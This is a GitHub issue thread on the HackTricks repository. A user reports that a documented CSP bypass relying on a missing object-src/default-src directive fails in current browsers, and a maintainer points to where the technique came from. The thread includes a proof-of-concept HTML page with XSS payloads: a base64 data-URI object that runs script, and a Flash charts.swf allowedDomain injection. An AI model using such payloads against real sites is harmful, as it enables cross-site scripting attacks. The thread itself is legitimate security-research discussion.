hacktricks icon indicating copy to clipboard operation
hacktricks copied to clipboard

Published 20 hours ago verified publisher icon HackTricks-wiki

CSP Bypass: "Lack of object-src and default-src" not working

Open PinkDraconian opened this issue 1 year ago • 1 comments

Relating this part of HackTricks.

The bypass shown here doesn't work on either the latest Chrome or Firefox. Is there any source where this came from?

PoC:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <meta http-equiv="Content-Security-Policy" content="script-src 'self' ;">
</head>
<body>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
    <param name="AllowScriptAccess" value="always"></object>
</body>
</html>

This results in Content Security Policy: The page’s settings blocked the loading of a resource at inline (“script-src”).

PinkDraconian avatar Sep 02 '22 09:09 PinkDraconian

Yes, the third reference of that page brings you to https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d There you can find that technique (which I guess could be no longer working? I will try it)

carlospolop avatar Sep 04 '22 09:09 carlospolop